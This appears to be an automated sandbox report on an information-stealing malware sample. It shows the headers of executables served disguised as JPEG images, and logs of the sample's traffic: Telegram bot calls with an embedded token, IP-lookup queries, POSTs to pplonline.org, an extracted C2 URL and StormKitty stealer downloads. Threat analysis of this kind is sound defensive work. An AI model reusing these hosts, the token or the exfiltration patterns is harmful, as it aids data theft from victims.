00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:23 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:00:58 GMT Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=73 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:24 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:01:20 GMT Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=72 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:24 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:01:30 GMT Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=71 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:25 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:01:44 GMT Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=70 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:27 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:02:02 GMT Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=69 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe DNS query: name: icanhazip.com
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe DNS query: name: icanhazip.com
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe DNS query: name: ip-api.com
Posts data to a JPG file (protocol mismatch)
Source: unknown HTTP traffic detected: POST /Cgi//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: aegismd.ca/cgi/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Cgi//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//1.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//2.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//3.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//5.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//7.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//main.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi/ HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 91380Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Downloads executable code via HTTP
